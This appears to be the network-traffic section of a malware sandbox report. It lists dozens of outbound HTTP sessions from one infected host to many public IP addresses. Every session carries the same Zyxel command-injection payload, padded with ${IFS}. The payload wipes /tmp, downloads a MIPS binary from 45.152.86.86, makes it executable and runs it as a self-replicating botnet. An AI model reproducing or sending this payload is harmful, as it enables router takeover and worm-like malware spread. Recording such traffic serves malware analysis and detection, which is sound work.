                              903192.168.2.1339862206.248.39.254443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:05.509464025 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              904192.168.2.1341354136.132.180.37443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:05.509485006 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              905192.168.2.1353328182.0.137.243443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:05.509551048 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              906192.168.2.1345390217.66.40.213443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:05.509582043 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              907192.168.2.1349898170.228.46.75443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:05.509619951 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              908192.168.2.1344960140.21.16.126443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:05.509666920 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              909192.168.2.1341182160.53.125.123443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:05.509700060 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              910192.168.2.1352974114.60.177.117443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:05.509741068 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              911192.168.2.1340158152.164.122.252443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:05.509790897 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              912192.168.2.1357338166.26.46.242443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:05.509836912 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              913192.168.2.135736818.10.195.198443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:05.509855986 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              914192.168.2.134395473.96.35.35443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:05.509926081 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              915192.168.2.1349058202.4.10.160443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:05.509959936 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              916192.168.2.1339508100.255.166.98443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:05.509995937 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              917192.168.2.135607650.87.61.32443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:05.510025024 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              918192.168.2.1335080206.248.180.138443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:05.510075092 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              919192.168.2.134163648.252.105.22443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:05.510114908 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              920192.168.2.1345486141.89.169.225443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:05.510166883 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              921192.168.2.1336898169.97.212.6443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:05.510200977 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              922192.168.2.1341630111.77.150.44443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:05.510217905 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              923192.168.2.135672469.46.64.101443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:05.510298967 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              924192.168.2.1355234122.27.136.187443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:05.510317087 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              925192.168.2.1352584177.160.58.139443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:05.510353088 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              926192.168.2.134609227.174.245.131443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:05.510390997 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              927192.168.2.135853234.145.181.5443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:05.510404110 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              928192.168.2.134645688.76.33.10443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:05.510453939 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              929192.168.2.1350042177.230.172.175443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:05.510514975 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              930192.168.2.1356470148.39.45.24443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:05.510549068 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              931192.168.2.1351456181.236.245.148443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:05.510564089 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              932192.168.2.1358204157.72.159.187443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:05.510611057 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              933192.168.2.1334580128.39.68.247443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:05.510629892 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              934192.168.2.1343116178.237.33.110443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:05.510689020 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              935192.168.2.1343298139.9.154.82443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:05.510734081 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              936192.168.2.1345034170.20.191.244443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:05.510783911 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              937192.168.2.1360060212.184.206.48443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:05.510801077 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              938192.168.2.133504217.36.248.236443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:05.510838985 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              939192.168.2.1347406160.136.88.150443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:05.510879993 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              940192.168.2.1341798101.193.197.9443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:05.510931969 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              941192.168.2.13598569.255.50.166443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:05.510948896 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              942192.168.2.1349090188.98.210.96443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:05.511012077 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              943192.168.2.133614079.122.142.164443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:05.511037111 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              944192.168.2.135194482.225.112.23443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:05.511080980 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              945192.168.2.1337424191.203.93.177443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:05.511127949 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              946192.168.2.1339620108.224.144.52443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:05.511168957 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              947192.168.2.135071043.55.128.66443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:05.511202097 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              948192.168.2.1338320217.148.107.134443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:05.511253119 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              949192.168.2.135320845.182.58.137443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:05.511271000 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              950192.168.2.133501217.42.149.65443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:05.511326075 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              951192.168.2.1355300170.166.233.21443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:05.511362076 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              952192.168.2.134671637.111.38.152443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:05.511390924 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              953192.168.2.1356510219.93.164.71443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:05.511423111 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              954192.168.2.1333524132.134.93.117443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:05.511482000 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              955192.168.2.1336616180.39.213.226443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:05.511544943 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              956192.168.2.133459842.106.72.65443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:05.511568069 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              957192.168.2.1344012130.152.55.233443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:05.511599064 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              958192.168.2.13475302.255.107.233443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:05.511621952 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              959192.168.2.1350796117.210.225.38443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:05.511693001 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              960192.168.2.1358426176.54.224.207443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:05.515398979 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              961192.168.2.1336592160.16.158.11443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:05.515430927 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              962192.168.2.1335214117.194.25.37443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:05.515469074 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              963192.168.2.135490674.113.151.214443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:05.515507936 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              964192.168.2.1340386200.245.6.4443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:05.515537024 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              965192.168.2.134207237.68.85.98443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:05.515592098 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              966192.168.2.1357080213.170.130.225443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:05.515623093 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              967192.168.2.135579234.72.225.149443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:05.515686035 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              968192.168.2.1347234211.99.235.190443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:05.515714884 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              969192.168.2.13352482.21.35.14443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:05.515772104 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              970192.168.2.133489245.48.34.156443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:05.515804052 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              971192.168.2.135017074.61.214.133443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:05.515836954 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              972192.168.2.133396061.64.164.98443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:05.515891075 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


